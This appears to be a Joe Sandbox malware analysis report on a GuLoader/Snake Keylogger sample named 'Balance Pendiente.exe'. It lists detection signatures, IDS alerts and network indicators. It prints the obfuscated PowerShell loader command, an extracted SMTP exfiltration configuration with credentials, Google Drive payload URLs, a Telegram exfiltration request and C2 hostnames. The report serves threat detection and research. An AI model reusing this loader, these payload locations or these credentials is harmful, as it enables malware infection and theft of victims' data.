Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Balance Pendiente.exe

Overview

General Information

Sample name:Balance Pendiente.exe
Analysis ID:1623448
MD5:e70e71a31781b44f850a39693784ce74
SHA1:ce8cf2dc1b30d5d6870cc3d374c15e1005fdc879
SHA256:a02b56b4c74424b72ae21d4737e822653e68b9762e1aeb313d81bd45abce39e7
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Balance Pendiente.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\Balance Pendiente.exe" MD5: E70E71A31781B44F850A39693784CE74)
    • powershell.exe (PID: 6964 cmdline: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 5660 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "federico@extintoresdemir.com", "Password": "s46S2&4+", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000001.00000002.2174295669.000000000A3CE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: msiexec.exe PID: 5660JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: msiexec.exe PID: 5660JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.18.14, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5660, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49770
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6964, TargetFilename: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)", CommandLine: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Balance Pendiente.exe", ParentImage: C:\Users\user\Desktop\Balance Pendiente.exe, ParentProcessId: 6592, ParentProcessName: Balance Pendiente.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)", ProcessId: 6964, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-25T08:27:43.138773+010028033053Unknown Traffic192.168.2.449828104.21.96.1443TCP
            2025-02-25T08:27:45.588203+010028033053Unknown Traffic192.168.2.449848104.21.96.1443TCP
            2025-02-25T08:27:46.775686+010028033053Unknown Traffic192.168.2.449855104.21.96.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-25T08:27:41.175108+010028032742Potentially Bad Traffic192.168.2.449812158.101.44.24280TCP
            2025-02-25T08:27:42.581340+010028032742Potentially Bad Traffic192.168.2.449812158.101.44.24280TCP
            2025-02-25T08:27:43.800116+010028032742Potentially Bad Traffic192.168.2.449830158.101.44.24280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-25T08:27:35.888216+010028032702Potentially Bad Traffic192.168.2.449770172.217.18.14443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-25T08:27:53.628181+010018100071Potentially Bad Traffic192.168.2.449905149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "federico@extintoresdemir.com", "Password": "s46S2&4+", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
            Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exeReversingLabs: Detection: 37%
            Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exeVirustotal: Detection: 44%Perma Link
            Source: Balance Pendiente.exeVirustotal: Detection: 44%Perma Link
            Source: Balance Pendiente.exeReversingLabs: Detection: 37%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.1% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Balance Pendiente.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49818 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.4:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49781 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49905 version: TLS 1.2
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00405E6B FindFirstFileA,FindClose,0_2_00405E6B
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00405427 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405427
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02EDF45Dh6_2_02EDF2D5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02EDF45Dh6_2_02EDF4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02EDFC19h6_2_02EDF974

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49905 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2025/02/2025%20/%2014:12:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49830 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49812 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49770 -> 172.217.18.14:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49855 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49848 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49828 -> 104.21.96.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49818 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2025/02/2025%20/%2014:12:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 25 Feb 2025 07:27:53 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000001.00000002.2167965758.0000000006F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: Balance Pendiente.exe, Balance Pendiente.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Balance Pendiente.exe, Balance Pendiente.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.2160143305.0000000004761000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: powershell.exe, 00000001.00000002.2160143305.0000000004761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBdq
            Source: powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F40000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
            Source: msiexec.exe, 00000006.00000002.2993742272.0000000021F3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBdq
            Source: powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
            Source: msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2992671188.00000000213B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_
            Source: msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_$
            Source: msiexec.exe, 00000006.00000003.2349911508.0000000006381000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981936990.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2318802167.0000000006348000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981936990.0000000006329000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2349866651.0000000006344000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2349813528.000000000633C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981936990.0000000006342000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download
            Source: msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
